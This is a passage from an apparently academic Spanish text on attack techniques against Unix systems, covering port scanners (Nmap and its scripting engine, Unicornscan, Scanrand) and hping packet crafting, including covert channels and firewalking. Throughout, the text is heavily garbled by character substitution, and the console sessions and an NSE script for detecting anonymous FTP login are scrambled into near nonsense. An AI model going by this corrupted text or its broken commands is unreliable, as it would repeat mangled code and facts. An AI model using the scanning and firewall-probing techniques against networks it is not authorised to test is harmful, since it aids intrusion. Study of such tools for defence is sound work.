*-2 Ler Plosario% 5MQ% Qona 5es ilitarizada# "g. 2*.. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 0O de 22O

Ca")tulo J. ( J.2.@ a" N Ms ?"ciones

"osibilidades de evitar 75,s. 2. polite ;CeducadoD>% Este tiene odo es Gtil si la red es "oco con/iable ' uc$as ca)das# o tiene "oco anc$o de bandaH @ a" es"era "or odo "or de/ecto# que ade s inclu'e la "aralelizaci8n ilisegundos entre "robesH es

.#1 segundos entre "robes# que ta bin son en serie. -. normal% Es el de los probes. 1. a))resive ;CagresivoD>% Es"era "or *. conveniente "or sobre el de red. 5. insane ;CinsanoD>% ,8lo sirve si se dis"one de una e9celente cone9i8n ' se "re/iere sacri/icar "recisi8n en "os de velocidad# 'a que s8lo es"era "or 5 ilisegundos entre probes. 5e todas /or as# cabe resaltar que el tie "o entre probes no es el Gnico "ar etro que con/igura auto tica ente el te "late elegido# sino que cada uno es una co binaci8n de C(( a9(rtt(ti eoutD# C((initial(rtt( ti eoutD# C(( a9(retriesD# C(($ost(ti eoutD# etc. Aleatori3ar los 9osts a escanear% ,i se est escaneando una red con uc$os $osts# es s "robable que "ase desa"ercibido un scan ClentoD ' aleatorio en el sentido de los $osts a enviar los probes. :a o"ci8n C(( rando ize($ostsD activa esta caracter)stica. odo nor al si se "osee una buena cone9i8n

J.2.-. 7nter/az Pr/ica ( Qen a"


5esde la versi8n 1.5. ;5icie bre de 2..+># @ a" inclu'e Qen a"# una inter/az gr/ica la inter/az ulti"lata/or a# renovada ' ejorada con res"ecto a la anterior ;@ a"FE># con la gran a'or)a de o"ciones de consola dis"onibles ta bin desde

is a. Esto "er ite en "ri era instancia que usuarios no e9"ertos

"uedan e9"eri entar sin conocer "revia ente las o"ciones de la consola. Ade s# /acilita el guardado de in/or es de escaneos "revios# co binar ' co "arar varios resultados# $acer varios escaneos al "er/iles co "letos de escaneo. is o tie "o ' crear

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. 00 de 22O

Ca")tulo J. ( J.2.@ a" N Ms ?"ciones

7lustraci8n +% Ca"tura de !antalla de Qen a" $aciendo 2 escaneos a la vez

J.2.1. Motor de ,cri"ting%


Fa bin en la versi8n 1.5.# @ a" incor"or8 otra caracter)stica que lo $ace uc$o s "oderoso ' que /ue desarrollada durante largo tie "o% el @,E ;Gmap Scripting 3ngine N Motor de ,cri"ting de @ a">.
S@MA!U@,ET

Bsica ente consiste en la "osibilidad de i "le entar scri"ts *-- o /rag entos de c8digo /uncionales que a "l)an las ca"acidades inclu)das en el so/tIare# con di/erentes objetivos# co o "or eje "lo% 4roceso de descu(rimiento de Red% 5ado el caso# si se escanea una 2<:# se "uede buscar auto tica ente en bases de datos "Gblicas "or in/or aci8n Gtil.

Detecci-n de Bersiones ms poderosa% Co o se vio anterior ente# si

*-- Ler Plosario% ,cri"t# "g. 2*2. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *.. de 22O

Ca")tulo J. ( J.2.@ a" N Ms ?"ciones

bien el /inger"rinting basado en e9"resiones regulares es "oderoso# no sie "re obtiene toda la in/or aci8n "osible# co o sucede con el "rotocolo ,MB ' @F,. 2n scri"t en el @,E "uede recabar caso o en otros.

s in/or aci8n en este

Detecci-n ! Fxplotaci-n de Bulnera(ilidades% ,i un aviso de seguridad se "ublica ' se dis"one de la "rueba de conce"to# con un scri"t en @ a" se "uede $acer un r"ido c$equeo del estado de esta vulnerabilidad. :o is o sucede uc$os $osts con res"ecto a con la e9"lotaci8n de

vulnerabilidades# segura ente de i "ortancia "ara los penetration testers. @ a" inclu'e en su distribuci8n "or de/ecto varios scri"ts listos "ara ejecutarse# ' 'a que estn basados en el lenguaje :2A *-1# son de lectura# anlisis ' u' sencilla odi/icaci8n. !or eje "lo# uno de estos co "rueba si un

servicio FF! "er ite login del usuario C anon1mousD# co o se "uede ver en la Consola 21H "or su "arte# el c8digo /uente se inclu'8 en la Consola 25.
marcelo@saturno:~/src/nmap/bin$ sudo ./nmap &&scriptR./anon+2*.nse &< &s- &p 21 192.168.0.100 .tarting Nmap +.60 9 'ttp:;;nmap.org : at (00)-0+-09 (1:31 #$T 8nitiating #$P Ping .!an at (1:31 .!anning 19(.16).0.100 -1 port0 ,omp"ete7 #$P Ping .!an at (1:314 0.0( e"ap e7 91 tota" 'o t : 8nitiating ./N .tea"t' .!an at (1:31 .!anning t unami 919(.16).0.100: -1 port0 Di !o@ere7 open port (1;t!p on 19(.16).0.100 ,omp"ete7 ./N .tea"t' .!an at (1:314 0.0( e"ap e7 91 tota" port : .,$8PT <NH8N<: 8nitiating !ript !anning. 8nitiating .,$8PT <NH8N< at (1:31 ,omp"ete7 .,$8PT <NH8N< at (1:314 +.73 e"ap e7 ?o t t unami 919(.16).0.100: appear to be up ... goo7. 8ntere ting port on t unami 919(.16).0.100:: PO$T .T#T< .<$=8,< 21/tcp open 6tp ON %nonDmous +2*: +2*: %nonDmous login allo>ed 3#, #77re : 00:0,:(9:90:(#:(D 9=3>are: $ea7 7ata fi"e from: ;'ome;mar!e"o; r!;nmap; 'are;nmap Nmap 7one: 1 8P a77re 91 'o t up: !anne7 in 5.3)3 e!on7 $a> pa!6et ent: ( 9)6C: F $!@7: ( 9)6C: marcelo@saturno:~/src/nmap/bin$

Consola 21% Eje "lo de un scri"t @,E en ejecuci8n

Ade s de i "le entar el "uedan reutilizar c8digo ' sean lo

otor del lenguaje# @,E inclu'e una A!7 o s co unes "ara que los scri"ts o ento# s8lo s sencillos "osibles. =asta el

biblioteca con las /unciones ' "rotocolos


*-1 ,itio 4eb del lenguaje :2A% $tt"%&&III.lua.org

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *.* de 22O

Ca")tulo J. ( J.2.@ a" N Ms ?"ciones

dos ti"os de scri"ts son so"ortados% 4or servicio% ,e ejecutan cada vez que un "uerto abierto es detectado# ' su salida se uestra en la /ila res"ectiva de dic$o servicio en el in/or e de a'or in/or aci8n. @ a"H $a' dis"onibles varios scri"ts que detectan ciertos servicios con s "recisi8n o con

4or 9ost% ,on ejecutados "or $ost a escanear# 'a que "ueden estar asociados a tareas con el no bre de do inio# situaci8n dentro de la <ed destino ' su /ireIall# 7!# etc.

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *.2 de 22O

Ca")tulo J. ( J.2.@ a" N Ms ?"ciones

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *.- de 22O

Ca")tulo J. ( J.2.@ a" N Ms ?"ciones

i71V#nonEmou BTPV 7e !ription1V,'e!6 to ee if a BTP er@er a""o> aut'or 1 V<77ie Ce"" TeY"be""Igmai".!om>V "i!en e 1 V.ee nmap ,OP/8NH for "i!en!eV !ategorie 1 aVintru i@eVb require V 'ortportV portru"e 1 'ortport.portAorA er@i!e9(14 VftpV: a!tion 1 6unction9'o t4 port: local o!6et 1 nmap.ne>A o!6et9: local re u"t local tatu 1 true local i #non 1 6alse local errA!at!' 1 6unction9: o!6et:!"o e9: end local trE 1 nmap.ne>AtrE9errA!at!'9::

anonEmou

"ogin V

o!6et: etAtimeout95000: trE9 o!6et:!onne!t9'o t.ip4 port.number4 port.proto!o":: trE9 o!6et: en79VK.<$ anonEmou [r[nV:: trE9 o!6et: en79VP#.. 8<K erI[r[nV:: >Iile tatu do tatu 4 re u"t 1 o!6et:re!ei@eA"ine 91:L i6 tring.mat!'9re u"t4 VW(30V: tIen i #non 1 true brea= end end o!6et:!"o e9: i69i #non: tIen return VBTP: #nonEmou end en7 "ogin a""o>e7V

Consola 25% Fuente del ,cri"t "ara @,E que detecta si un ,ervidor FF! ace"ta login an8ni o

J.-. 2nicornscan
:os desarrolladores de 2nicornscan lo de/inen co o un frame.ork)0D distribuido de Est) ulo&<es"uesta utilizando co o i "le entar un stac6 FC!&7! distribuido en edio la red# "or lo que no s8lo es un "ort scanner. ,e distribu'e bajo la licencia P!: v2# ' su objetivo es odo usuario *-J. Est diseBado "ara is o que Csola ente ser Cescalable# "reciso# /le9ible ' e/icienteD *-+# que no es lo

*-5 Ler Plosario% Fra eIor6# "g. 2*.. *-J El so/tIare en C odo usuarioD es aquel que es ejecutado "or el ,? co o un "roceso usuario# ' bajo sus "rivilegios# a di/erencia de los "rocesos o *-+ ,itio del !ro'ecto 2nicornscan% $tt"%&&III.unicornscan.org& C odo nGcleoD ;o kernel>. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&RernelU ode

s del

8dulos que se ejecutan en el

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *.1 de 22O

Ca")tulo J. ( J.-.2nicornscan

ser r"idoD. Algunas de sus caracter)sticas

s i "ortantes son%

Escaneo FC! asincr8nico sin estado# con todas las co binaciones de banderas FC!. 5anner @rabbing FC! asincr8nico# sin estado. Escaneo asincr8nico 25! de "rotocolos es"ec)/icos ;env)a lo su/iciente en el "a'load 25! "ara obtener una res"uesta>. 7denti/icaci8n activa ' "asiva del ,iste a ?"erativo ' a"licaciones# analizando las res"uestas. :og ' Filtrado de arc$ivos !CA!*-O ,alida a Bases de 5atos relacionales "ara "osterior anlisis. ,o"orte de 8dulos "ersonalizados ;'a que "rovee una A!7>. Listas "ersonalizadas de conjuntos de datos. Mide el caudal ;o Ct roug putD2 de entrada&salida de la red en "aquetes "or segundo ;!!,>. ,u arquitectura est basada en "rocesos ;no $ilos *-0># ' una uestra del

is o en /unciona iento se encuentra en la 7lustraci8n O S2@7C?<@U5EFC?@T# donde se "uede ver un !ort ,can distribu)do.

*-O !ca" es la librer)a

s "o"ular "ara ca"tura ' al acena iento de "aquetes de redH la

a'or)a

de sni//ers# scanners ' analizadores de red lo utilizan. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&!ca" *-0 Ler Plosario% =ilos ;F$reads># "g. 2**. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *.5 de 22O

Ca")tulo J. ( J.-.2nicornscan

7lustraci8n O% Esque a de !rocesos 5istribu)dos Enviadores&<ece"tores de 2nicornscan

En "rinci"io# con los co "onentes se"arados se "uede a"reciar la

a'or

inde"endencia ' "otencial escalabilidad# $asta el "unto de "oder construir un cluster*1. de nodos co o "ortscanner# analizadores de red# o lo que se necesite ;recordar el co "orta iento Cest) ulo&res"uestaD de 2nicornscan>. !ara esto es necesario i "le entar el anejo FC! "or s) is o# dejando de lado el del nGcleo del ,iste a ?"erativo donde se ejecute. :os co "onentes "rinci"ales son tres%

C/aster &ontrolD% Es un Gnico "roceso que tiene el control de todas las o"eraciones# qu se debe enviar# quin lo debe $acer# global de la ejecuci8n del "rogra a. antiene los estados de las cone9iones# las res"uestas# etc. En resu en# i "le enta la l8gica Unisend% Es un "roceso que s8lo se encarga de enviar "aquetes "or la red. !uede $aber varias instancias de ellos en un o ento deter inado. Unilisten% Es el "roceso que s8lo se encarga de escuc$ar "or res"uestas# ' devolverlas al /aster &ontrol. 2nicornscan# "ara lograr escalabilidad ' velocidad# utiliza el is o todo

de

anejo asincr8nico ' sin estado de cone9iones FC! ;C,K@ cookies inversoD>

que el siguiente "ort scanner# ,canrand.

*1. Cluster% Conjunto de co "utadoras que trabajan en gru"o ' actGan co o un nodo Gnico e indivisible# en "os de lograr un objetivo su ando el recurso de cada uno de sus co "onentes. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&Co "uterUcluster Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *.J de 22O

Ca")tulo J. ( J.-.2nicornscan
marcelo@saturno:~/src/unicornscan/bin$ u7o .;uni!orn !an -@ !i!"on a77ing 19(.16).0.30;3( mo7e cT,P !anJ port c74941141341)4194(1(34(54374394+(4+9450453465467-70479-)14))49)41004105-10741091114113411)411941(341(941354137-1394?...@J pp 300 u ing interfa!e9 : et'0 !aning 1.00eP00 tota" 'o t >it' 3.3)eP0( tota" pa!6et 4 'ou"7 ta6e a "itt"e "onger t'an ) .e!on7 en7er tati ti! (9+.+ pp >it' 33) pa!6et ent tota" "i tener tati ti! ) pa!6et re!ie@e7 0 pa!6et 7rope7 an7 0 interfa!e 7rop T,P open ftp(10 from 19(.16).0.30 tt" 6+ T,P open '((0 from 19(.16).0.30 tt" 6+ T,P open 7omain530 from 19(.16).0.30 tt" 6+ marcelo@saturno:~/src/unicornscan/bin$

Consola 2J% Escaneo de "uertos con 2nicornscan

J.1. ,canrand
Este "ortscanner est inclu)do en una CsuiteD de $erra ientas de seguridad lla ada C!a6etto ReiretsuD*1*# desarrollada "or 5an Ra ins6'. Fiene co o "ri er ' s i "ortante objetivo $acer su trabajo lo ms rpido posi(leK ade s# "osee un diseBo "arecido al de 2nicornscan ;aunque ste es "osterior>. :a di/erencia "rinci"al reside en que ,canrand no "osee un "roceso de control aestro ;no lo necesita# 'a que s8lo es un !ort ,canner># ' no crea @ "rocesos CenviadoresD o senders. En su que s8lo env)e la eta de alcanzar el 9i o rendi iento en un escaneo# esta $erra ienta innov8 en algunos as"ectos. !or eje "lo# al i "le entar un "roceso ensajes ' otro que s8lo los reciba sin co unicarse entre s)H ' ejorar# en un "roceso de es"acio del usuario# "arte de ta bin al i "le entar '

quina /inita de estados de FC!*12. !ara esto su autor# 5an Ra in6s'# desarroll8 la tcnica del C7nverted ,K@

Coo6ieD# o ,K@ Coo6ie 7nverso# que intenta a"licar la tcnica de las ,K@ Coo6ies*1- "ero del lado del cliente ;quien realiza el "ortscan>. A grandes rasgos S,A@,U,CA@<A@5T# ,canrand /unciona de la siguiente anera% I. Crea un "roceso CenviadorD ;sender> ' el "roceso "rinci"al se convierte en CrecibidorD o Cescuc$adorD ;listener o receiver>. Penera un nG ero CclaveD o Cse illaD ;seed># aleatorio "or de/ecto# que se utilizar en toda la
*1* 2<:% $tt"%&&III.do9"ara.co & *12 !ara ver la F,M ;Finite State /ac ine N Mquina de Estados Finitos> de FC!# ir al Ane9o A. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *.+ de 22O

Ca")tulo J. ( J.1.,canrand

ejecuci8n del "rogra a. II. Al "roceso enviador s8lo le dice qu $osts ' "uertos debe escanear# envindole ta bin la clave a utilizar. III. Este s8lo env)a los ,K@s a los destinos corres"ondientes ' ter ina# "ero utilizando co o 7,@*11 el resultado de la siguiente /8r ula*15%
IANOTruncar D81A/.A8A.7 DDI40ri)II4DestI4to0ri)I4toDestE% /laveE% ;+(itsE

5onde =MAC es un algorit o "ara generar un c8digo de autenticaci8n del ensaje*1J. Ka que en un escaneo $abr s8lo una Gnica co binaci8n de
)I+

estos cinco "ar etros# cada IAN )enerado por esta =-rmula es 'nico# ' "odr)a considerrselo un as . Este valor es lo que se lla a C,K@ odo "ro iscuo ;es "or Coo6ieD# ' es inverso "orque se lo calcula en el cliente ' no en el servidor. IB. El "roceso que escuc$a "or res"uestas lo $ace en esto que "ara ejecutar ,canrand es necesario tener los "rivilegios adecuados>. !or cada "aquete que recibe o Cca"turaD el $ost# ,canrand se encarga de veri/icar que est dirigido a l# 'a que "uede que el is o sea "roducto del escaneo o no ;otro tr/ico del $ost>. :a Gnica in/or aci8n que utiliza "ara $acerlo es el "aquete recibido en s) ' la clave generada al co ienzo. B. El todo de veri/icaci8n consiste en% 7. Ca"turar un "aquete dirigido al $ost. +. El "aquete "ertenece a ,canrand si% a. El "a'load 7! contiene un "aquete del "rotocolo 7CM!# o
*1- :a tcnica de las ,K@ Coo6ies /ue desarrollada en *00J co o res"uesta a los ataques de Cinundaci8n de ,K@sD ;,K@ floods>. Consiste en que el ,?# teniendo "rocesos en odo :7,FE@# no reserve recursos "ro"ios cuando recibe un ,K@# sino descartarlo# ' devolver el ,K@_ACR al cliente con una /ir a un)voca en el nG ero de secuencia inicial FC!. 5ic$a /ir a es el resultado de cierta in/or aci8n del ,K@ original# a"licada a una /unci8n de dis"ersi8n ; as >. Al recibir el ACR corres"ondiente# el ,? "uede identi/icar si corres"onde a una cone9i8n vlida o no# veri/icando una "osible /ir a en el ca "o @G ero de ACR FC!. Ler% $tt"%&&en.Ii6i"edia.org&Ii6i&,'nUcoo6ies# $tt"%&&en.Ii6i"edia.org&Ii6i&,K@U/lood *11 !ara ver qu es un 7,@# ir a la "gina J0. *15 En dic$a /8r ula# el s) bolo C_D signi/ica concatenaci8n. ,canrand la trunca a -2 bits ;=MAC(,=A(* genera un $as$ de *J. bits> "ara que "ueda ser al acenada en el ca "o ,EV del encabezado FC!. =a' que tener en cuenta esto reduce la e/ectividad del algorit o ,=A(*. *1J !ara s in/or aci8n sobre =MAC# ver% $tt"%&&en.Ii6i"edia.org&Ii6i&= ac *1+ Ler Plosario% =as$# "g. 2**. Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *.O de 22O

Ca")tulo J. ( J.1.,canrand

(. Es FC! ' el /lag de ,K@_ACR activado# o c. Es FC! ' el /lag <,F_ACR estn activados# o d. Es FC! ' el /lag <,F est activado. e. En caso contrario# "asar al siguiente "aquete ca"turado ;7r a *>. ;. ?btener el @G ero de ACR del ca "o FC! ' restarle *. Este valor es igual al 7,@ que recibi8 el destino. IAN+ O A/J.7. <. Penerar el 7,@ "ara la co binaci8n 7! ?rigen# 7! 5estino# !uerto ?rigen# !uerto 5estino# Clave# de la ; enos la clave# claro est>.
IANOTruncar ;+(itsE D81A/.A8A.7 DDI40ri)II4DestI4to0ri)I4toDestE% /laveE%

is a /or a que el "roceso

CenviadorD# pero tomando estos valores del paquete capturado

. ,i 7,@ a 7,@2# el "aquete "ertenece a una res"uesta a un probe de ,canrand. #. ,e evalGa el&los /lags FC! o 7CM! que contiene el "aquete# "ara ostrar "or la salida el resultado del "robe "ara dic$o "uerto ;abierto# cerrado# etc.>.
root@ubuntu&ser<er:~A !anran7 -b13 -t 1 19(.16).0.1-(5+: qui!6 KP: 19(.16).0.100:)0 -010 (.1(+ root@ubuntu&ser<er:~A !anran7 -b13 -t 3 19(.16).0.1-(5+: qui!6 KP: 19(.16).0.100:)0 -010 (.091 root@ubuntu&ser<er:~A !anran7 -b13 -t 5 19(.16).0.1-(5+: qui!6 KP: 19(.16).0.100:)0 -010 (.0(+ KP: 19(.16).0.1:(1 -0(0 15.350 KP: 19(.16).0.30:(1 -010 15.930 KP: 19(.16).0.100:(1 -010 17.330 KP: 19(.16).0.(0:(( -010 (0.)(9 KP: 19(.16).0.30:(( -010 (1.031 KP: 19(.16).0.1:(3 -0(0 (5.551 KP: 19(.16).0.100:(3 -010 (7.5(9 root@ubuntu&ser<er:~A

Consola 2+% Ejecuci8n de ,canrand con di/erentes tie "os de es"era

,canrand en s) no "osee "ara que utilice

uc$os "ar etros# "ero "er ite ser con/igurado s r"ido

enos anc$o de banda ;"or de/ecto env)a "aquetes lo

que "uede># es"ere "or res"uestas una cierta cantidad de tie "o# utilice una se illa en "articular# etc. 2na ejecuci8n de eje "lo se uestra en la Consola 2+# donde se le indica a ,canrand que escanee una subred de 25J $osts# utilice * MB&seg. del anc$o de banda ;(b*M># ' es"ere *# - ' $asta 5 segundos "or res"uestas coincidentes. Es aqu) donde "uede a"reciarse la "osibilidad de ignorar
Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *.0 de 22O

Ca")tulo J. ( J.1.,canrand

"aquetes que "rovienen una res"uesta.

s tarde# segGn la cantidad de tie "o que se es"era "or

En conclusi8n# el "roceso de escaneo de "uertos de ,canrand es asincr8nico# escalable ' uc$o s r"ido que un escaneo secuencial ;"uerto "or "uerto ' $ost onitoreo# aunque est bien claro que no es la "or $ost>. :a desventaja que tiene es que es "oco "robable que "ase desa"ercibido "ara los 75,s o $erra ientas de intenci8n de ,canrand evitarlasH ade s# $a' que tener en cuenta que en este caso la velocidad va en des edro de la "recisi8n. Es "or esto que ,canrand "uede ser u' Gtil "ara redes locales grandes ' r"idas# con buen anc$o de banda ' baja latencia# o donde no i "orte "asar desa"ercibido "ara el ad inistrador.

J.5. Mani"ulaci8n de !aquetes% ="ing


="ing*1O es una $erra ienta de seguridad in/or tica a "lia ente reconocida "or el a "lio abanico de "osibilidades que o/rece# 'a que "er ite ani"ular en un nivel relativa ente bajo*10 qu ti"o de "aquetes se enviarn "or la red# "ara luego quedarse a la es"era de res"uestas ;tal co o lo $ace el co ando "ing># ' luego ostrarlas "or la consola. u' r"ida ente# en ="ing- ;"ublicada s su "otencial ' antiene la ,i bien la versi8n 2 se $izo "o"ular

en el aBo 2..5> su creador# ,alvatore ,an/ili""o# incor"or8 un intr"rete e bebido del lenguaje FC:*5.# con el objetivo de a "liar aGn "er itir ejecutar scri"ts de la is a /or a *5* que @ a" dos aBos des"us

"er iti8 $acer. Ade s de estar reescrito en dic$o lenguaje# ="ing a'or co "atibilidad "osible con su versi8n anterior ;escrita en C>. !er itiendo al usuario la "ersonalizaci8n

inuciosa de los "aquetes FC!&7!

que se env)an# ="ing ;segGn su "gina Ieb> "er ite realizar%


!ruebas de reglas de /ireIalls ' /unciona iento de 75,s&7!,s. !ort ,canning avanzado# co o "or eje "lo el 7dle ,can ;no casual ente# 'a que el autor de ="ing /ue el que desarroll8 este ti"o de "ortscan>.

*1O ,itio Ieb del !ro'ecto ="ing% $tt"%&&III.$"ing.org& *10 A la de/inici8n C ani"ulaci8n de "aquetesD se la "uede asociar con C packet craftingD en el idio a ingls. !ara s in/or aci8n# ver% $tt"%&&III.securit'/ocus.co &in/ocus&*+O+ is o objetivo que @ a"H la distribuci8n estndar de ="ing *5. !gina o/icial del lenguaje FC:% $tt"%&&III.tcl.t6& *5* ="ing- inclu'e una A!7 con el inclu'e algunos scri"ts en lenguaje FC: ' que $acen uso de ella. Ler este enlace "ara conocer s sobre sus /uncionalidades% $tt"%&&Ii6i.$"ing.org&-1 Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. **. de 22O

Ca")tulo J. ( J.5.Mani"ulaci8n de !aquetes% ="ing

!robar la "er/or ance de la red utilizando di/erentes "rotocolos# ta aBos de "aquetes# valores de F?, 7! ;-1pe of Service H Fi"o de ,ervicio> ' /rag entaci8n de "aquetes. Pat /-U (iscover1)DA ;algo as) co o C5escubri iento del MF2 de la <utaD>. Esta es una tcnica "ara averiguar el MF2 ;2nidad 9i a de trans isi8n> de una ruta a un $ost. 5ado que un "aquete "uede atravesar varias redes de di/erentes tecnolog)as ' "or ende# di/erentes valores de MF2# el !at$ MF2 5iscover' "er ite averiguar cul es el ta aBo 9i o de "aquete 7! "ara que no se lo /rag ente en ningGn salto en su ca ino al destino. Frans/erencia de arc$ivos incluso entre reglas de /ireIall u' restrictivas

;creaci8n de &overt & annels o 5ack (oors>. 2n &overt & annel ;S47R7UC?LC=T#S,A@,UC?LC=T#S<?4UC?LC=T > es un canal de trans isi8n datos oculto# donde se utilizan o a"rovec$an "ro"iedades de la co unicaci8n en /or as di/erentes de las que /ue "ensado original ente# con la intenci8n de $acer "asar la co unicaci8n total ente desa"ercibida. !or eje "lo# con ="ing es "osible trans/erir datos v)a un "rotocolo no "ensado "ara ello# co o 7CM!.

-raceroute bajo todos los "rotocolos so"ortados ;no s8lo 25!>. Es decir# se "uede $acer un traceroute enviando "aquetes 7! con FF: incre entales "ero con "a'load FC!# "or eje "lo.*5Fire.alking. Esta es una tcnica derivada del traceroute ; SF4A:RT> que "er ite averiguar las reglas de /iltrado de un /ireIall envindole "aquetes es"ecial ente "re"arados. Finger"rinting de ,?s. Auditor)a del ,tac6 FC!&7!. Muc$os otros. ="ing ace"ta con di/erentes o"ciones de la l)nea de co andos el odo

;C"ingD "or de/ecto># el ti"o ;7CM!# FC!# 25!> de "aquetes a enviar# as) co o las di/erentes o"ciones de sus encabezados.
*52 !ara ver s de !MF25% Lisitar $tt"%&&en.Ii6i"edia.org&Ii6i&!at$U tuUdiscover'# o bien s in/or aci8n sobre Fraceroute# ver el Ca")tulo O de SFC!&7!U7llT.

leer el A"artado **.+ de SFC!&7!U7llT *5- !ara consultar

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. *** de 22O

Ca")tulo J. ( J.5.Mani"ulaci8n de !aquetes% ="ing

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. **2 de 22O

Ca")tulo J. ( J.5.Mani"ulaci8n de !aquetes% ="ing

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. **- de 22O

Ca")tulo J. ( J.5.Mani"ulaci8n de !aquetes% ="ing

Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. **1 de 22O

Ca")tulo J. ( J.5.Mani"ulaci8n de !aquetes% ="ing

marcelo@saturno:~$ sudo Iping 192.168.0.20 ?P8NH 19(.16).0.(0 9et'0 19(.16).0.(0:: NO B2#H. are et4 +0 'ea7er P 0 7ata bEte "en1+0 ip119(.16).0.(0 tt"16+ DB i7115++( port10 f"ag 1$# eq10 >in10 rtt10.7 m "en1+0 ip119(.16).0.(0 tt"16+ DB i71)79) port10 f"ag 1$# eq11 >in10 rtt11.) m "en1+0 ip119(.16).0.(0 tt"16+ DB i716+01 port10 f"ag 1$# eq1( >in10 rtt10.+ m "en1+0 ip119(.16).0.(0 tt"16+ DB i7115)61 port10 f"ag 1$# eq13 >in10 rtt10.+ m "en1+0 ip119(.16).0.(0 tt"16+ DB i711(55( port10 f"ag 1$# eq1+ >in10 rtt10.+ m --- 19(.16).0.(0 'ping tati ti! --5 pa!6et tran mitte74 5 pa!6et re!ei@e74 0S pa!6et "o roun7-trip min;a@g;maD 1 0.+;0.7;1.) m marcelo@saturno:~$ sudo Iping &- &c 1 192.168.0.20 &p 80 ?P8NH 19(.16).0.(0 9et'0 19(.16).0.(0:: . et4 +0 'ea7er P 0 7ata bEte "en1+0 ip119(.16).0.(0 tt"16+ DB i7130+0 port1)0 f"ag 1$# eq10 >in10 rtt10.6 m --- 19(.16).0.(0 'ping tati ti! --1 pa!6et tran mitte74 1 pa!6et re!ei@e74 0S pa!6et "o roun7-trip min;a@g;maD 1 0.6;0.6;0.6 m marcelo@saturno:~$ sudo Iping &- &c 1 192.168.0.20 &p 22 ?P8NH 19(.16).0.(0 9et'0 19(.16).0.(0:: . et4 +0 'ea7er P 0 7ata bEte "en1++ ip119(.16).0.(0 tt"16+ DB i71(0075 port1(( f"ag 1.# eq10 >in1163)+ rtt10.5 m --- 19(.16).0.(0 'ping tati ti! --1 pa!6et tran mitte74 1 pa!6et re!ei@e74 0S pa!6et "o roun7-trip min;a@g;maD 1 0.5;0.5;0.5 m marcelo@saturno:~$ sudo Iping &&scan 22580 &- &c 2 192.168.0.20 .!anning 19(.16).0.(0 919(.16).0.(0:4 port ((4)0 ( port to !an4 u e -= to ee a"" t'e rep"ie P----P-----------P---------P---P-----P-----P-----P FportF er@ name F f"ag Ftt"F i7 F >in F "en F P----P-----------P---------P---P-----P-----P-----P (( ' : ....#... 6+ +3031 163)+ ++ #"" rep"ie re!ei@e7. Done. Not re pon7ing port : marcelo@saturno:~$

Consola 2O% FC! !ing ' !ortscan con ="ing

En la consola 2O se "uede ver "ri ero la ejecuci8n de ="ing sin o"ciones# la cual corres"onde a un C"ingD FC! @ull al "uerto destino nG ero . ;'a que no se seleccionaron otros Flags o algGn "uerto>. :uego# sie "re dentro del "uerto 22 ;(" 22>. ,i bien el si "les# ="ing "rovee el odo C"ingD# se intenta enviar un ,K@ ;(,> una Gnica vez ;(c *> al "uerto O. ;(" O.> ' al odo C"ingD "uede servir "ara $acer escaneos s acorde a la o"eraci8n. odo CscanD ;((scan h"uertose> "ara es"eci/icar

intervalos de "uertos# con una salida

!ara con/igurar los di/erentes /lags en el encabezado FC!# "ueden utilizarse


Fcnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !g. **5 de 22O

Ca")tulo J. ( J.5.Mani"ulaci8n de !aquetes% ="ing

cualquier co binaci8n de las letras corres"ondientes en letra

a'Gscula% (F

;F7@># (, ;,K@># (< ;<,F># (! ;!,=># (A ;ACR># (2 ;2<P>. Fa bin "ueden de/inirse en los "aquetes a enviar cualquier valor del encabezado FC! ;"or eje "lo ((Iin# ((setseq# ((setac6.># 7! ;((ttl# ((id# ((i""roto# ((Iinid# etc.># 7CM! o 25!H en la salida se uestran /inal ente los valores que se utilizan.

marcelo@saturno:~$ sudo traceroute 200.68.121.1.0 tra!eroute to (00.6).1(1.1+0 9(00.6).1(1.1+0:4 30 'op maD4 +0 bEte pa!6et ?...@ + (00.51.(33.69 9(00.51.(33.69: 171.59+ m 1)1.3(+ m 191.96) m 5 (00.51.(17.(3) 9(00.51.(17.(3): (01.+5+ m (1(.106 m (((.51) m 6 !u tomer191-6.ip"annet>or6 .net 9(00.61.191.6: (31.5+0 m (65.(33 m (66.3)) m 7 Q Q Q ?...@ marcelo@saturno:~$ sudo Iping &z &i 10 &t 1 &2 &p 1 200.68.121.1.0 ?P8NH (00.6).1(1.1+0 9et'0 (00.6).1(1.1+0:: u7p mo7e et4 () 'ea7er P 0 7ata bEte TT2 0 7uring tran it from ip1(00.51.(17.(3) name1KN5NO&N TT2 0 7uring tran it from ip1(00.51.(17.(3) name1KN5NO&N 6: TT2 0 7uring tran it from ip1(00.61.191.6 name1!u tomer1916.ip"annet>or6 .net 7: I$G* *ort FnreacIable 6rom ipR200.68.121.1 0 nameRcustomer68&121& 1 0.iplannet>or=s.net 8,3P Port Knrea!'ab"e from ip1(00.6).1(1.137 name1!u tomer6)-1(1137.ip"annet>or6 .net ): --- (00.6).1(1.1+0 'ping tati ti! --) pa!6et tran mitte74 5 pa!6et 